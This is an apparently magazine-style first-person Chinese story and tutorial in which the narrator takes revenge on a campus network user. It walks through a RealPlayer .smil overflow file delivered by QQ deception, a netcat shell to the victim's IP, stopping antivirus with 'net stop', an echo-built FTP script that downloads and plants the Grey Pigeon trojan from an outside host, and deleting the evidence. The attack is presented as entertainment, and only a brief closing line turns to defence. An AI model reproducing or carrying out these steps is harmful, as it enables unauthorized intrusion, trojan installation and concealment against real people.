不凡的黑客幻想

上次說到黑不凡享受了美色大餐，還做了回無名英雄，不凡心里別提有多高興！可這股高興勁很快就被沖散了。怎么回事？難道有人敢在不凡的頭上動刀？欲知詳情，往下面瞧瞧吧！

今晚偶異常興奮，why？你說當青蛙遭遇白雪公主的電擊，后果會是如何？這不，我和高中時的班花正聊得不亦樂乎。可半路殺出個程咬金！不知誰老是和我IP沖突。這人咋就不聽嚴守一大哥的勸呢？做人要厚道嘛。我的校園網(wǎng)里的IP沒有綁定，可以隨意換，好不容易找到了一個空IP，可班花早已悄悄離去。Oh，my god！偶悲痛不已，惟有一句: 此仇不報非君子！

溢出一部曲 誘惑的就是你

要溢出必須先找到合適的漏洞，大多數(shù)溢出攻擊都拜微軟所賜，我立馬到微軟看看安全公告，沒有什么合適的。再到論壇泡泡，看看一些熱門的溢出漏洞，發(fā)現(xiàn)RealPlayer的.smil溢出漏洞很是火爆，幾乎覆蓋了所有版本，加之我所在的局域網(wǎng)根本就無法連上Real的服務器更新，想必成功率會很高。

此溢出漏洞的制作工具為real.exe，在DOS環(huán)境下輸入“real.exe *.smil”，就可生成含有溢出代碼的smil格式視頻文件（圖1）。

有了溢出攻擊的工具，再來就是看看是誰在害我了，我用《網(wǎng)絡執(zhí)法官》查看局域網(wǎng)，根據(jù)經(jīng)驗確定了對方的IP。接著就要誘騙對方看看這激情視頻了。嘿嘿……這可以我的拿手好戲。用QQSniffer嗅探對方IP上運行的QQ，自稱校友加好友，極盡本人誘惑之能事，看看你是不是個好色之徒！由于這是個視頻文件，QQ安全中心不會阻止，也不是.exe可執(zhí)行擴展名，絕對足以擊垮對方的心理防線。這不，我的魚兒上鉤了（圖2）。

溢出二部曲 瑞士軍刀出擊入侵任我行

對方一旦播放smil視頻就會打開13579端口，這就是我打入其內部的入口。有了端口，還得有好的端口入侵工具。有著“瑞士軍刀”美譽的NC就可擔此重任。

OK！遠程入侵正式開始。打開DOS窗口，運行“NC 218.197.110.242 13579”（圖3）。這樣就得到了對方的SHELL，具有讀寫的權限。哈哈……下一步該怎么做呢？當然是種馬啦！唉，不急，還沒把對方的防火墻和殺毒軟件干掉，怎么能貿然種馬呢？

在剛剛連接的SHELL中輸入“net start”查看對方開啟的服務。大勢不妙，對方裝有殺毒軟件。這可如何是好？停了不就得了。用“net stop”命令將它們干掉（圖4）。好了，掃清了障礙，激動人心的時刻到來了！我就要種馬了。

小知識

溢出攻擊

打個比方：水裝在杯子里，杯子的容量有限，水多了就會溢出。同樣，計算機里的數(shù)據(jù)是裝在緩沖區(qū)里的，多了也會溢出。一旦溢出就可以執(zhí)行任意代碼。例如溢出的數(shù)據(jù)是“ne tuser 1234 123/add”這樣的指令，就可以輕而易舉地獲取遠程管理權限。一般溢出攻擊會達到這樣一個目的：遠程執(zhí)行指令，返回一個SHELL，開個后門端口，獲取一定的權限。例如本文中的.smil溢出漏洞就可以打開對方的13579端口。

點評:黑客兵器譜之瑞士軍刀。有人因為其不是圖形界面而鄙視之，孰不知：古有“為人不識陳近南，便稱英雄也枉然”，在黑客圈子里，如果你不知道NC，那就愧對“黑客”二字了。端口掃描，反向連接，數(shù)據(jù)抓包都是NC的拿手好戲。反向連接更是可以穿過防火墻，乃溢出攻擊的最佳拍檔。本文中僅展示了NC遠程連接這個最基本的功能，有興趣的讀者可以深入研究，必定受益匪淺！

溢出攻擊三部曲 FTP種馬 爽就一個字

種馬的方式多種多樣，F(xiàn)TP種馬較為方便快捷，類似批處理文件，成功率比較高。哈哈……，深吸一口氣，我來種馬也！在打開的SHELL中依次輸入如下命令

echo open 218.197.110.133 > ftp.txt /連接FTP服務器/

echo seapig >> ftp.txt /登錄FTP服務器的賬號和密碼/

echo seapig >> ftp.txt

echo get help.exe >> ftp.txt /下載木馬服務端，此乃我養(yǎng)的灰鴿子/

echo bye >> ftp.txt /斷開FTP/

ftp s:ftp.txt /執(zhí)行生成的ftp.txt/

返回結果后，就這樣我的灰鴿子在對方的電腦里算是安家了（圖5）。運行木馬客戶端，等著魚兒上鉤吧。下面的時間該清理一下戰(zhàn)場了，刪除ftp.txt作案證據(jù)。

哈哈……魚兒上鉤了！不知怎么回事，剛剛那股惡氣沒有了，現(xiàn)在只是精神亢奮而已。本來想好好教訓一下這個破壞偶好事的人，現(xiàn)在心情比較High，來個黃牌警告算了。用灰鴿子給他帶去口信：這位仁兄，你可知你壞了我的好事，終生幸福就這樣給你毀了！沒事別用網(wǎng)管工具攻擊人家的IP！做人厚道點嘛。這次黃牌警告一下，下次可就要格硬盤了哦。

陶醉于成功入侵的喜悅中，突然QQ有系統(tǒng)消息：這位黑哥，小弟愿拜你為師。如果你不加小弟為好友，我會炮轟你的QQ的。我閃……

提示

1 .文中的遠程連接也可用telne t 命令代替，但成功率較低。

2 .此溢出攻擊的關鍵在于速度。因為對方打開smil視頻后會造成假死現(xiàn)象，如果通過任務管理器將其中止，那13579端口也會隨之關閉，入侵就會受阻。所以建議將FTP種馬的命令先放在記事本里，再粘貼輸入。

不凡感想 黑客的境界

俗話說：明槍易躲，暗箭難防。黑客的最高境界不在于攻，而在于防。技術是一種思想，高手是一種境界，而黑客則是一種精神，已脫離了技術層面，升華到思想與境界。防御一個攻擊要比入侵攻擊艱難，發(fā)現(xiàn)一個漏洞要比利用一個漏洞更有成就感！逐步走向黑客的最高境界，你會有這樣一個感覺：如果發(fā)現(xiàn)一個漏洞是源自靈感，那你希望發(fā)現(xiàn)下一個漏洞是源自技術，直到源自感覺！

本文中所涉及到的圖表、注解、公式等內容請以PDF格式閱讀原文。